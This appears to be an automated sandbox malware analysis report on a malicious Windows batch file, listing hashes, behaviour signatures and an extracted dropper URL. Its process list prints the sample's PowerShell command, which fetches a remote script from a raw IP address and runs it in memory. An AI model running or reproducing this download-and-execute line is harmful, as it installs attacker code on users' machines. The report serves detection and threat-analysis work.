Analysis
-
max time kernel
115s -
max time network
120s -
platform
windows7_x64 -
resource
win7 -
submitted
26-07-2020 14:10
General
-
Target
e241deaf6f1e1d0d13589a66c942bc3b.bat
-
Size
216B
-
MD5
c79f7f4fe4b00e41b6dce691ba63a8ae
-
SHA1
b8f15e882ed45e2278545ad4e686e16cb1787dc3
-
SHA256
2805f33e7f7992595a10507ddb57e5bcb3ed34d8b6e8dcfa984ef77c31037132
-
SHA512
b20d2b133be14683663d795b6c2abf5fb2b23a2b87cc9ddbba1218dbd5d9704d112d13d51e6cb62f18297c8797d2c3152501bc35f1f97af2821c19d201a40034
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/e241deaf6f1e1d0d13589a66c942bc3b
Signatures
-
Suspicious use of WriteProcessMemory 4 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Blacklisted process makes network request 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\e241deaf6f1e1d0d13589a66c942bc3b.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/e241deaf6f1e1d0d13589a66c942bc3b');Invoke-KXXKRQWJL;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request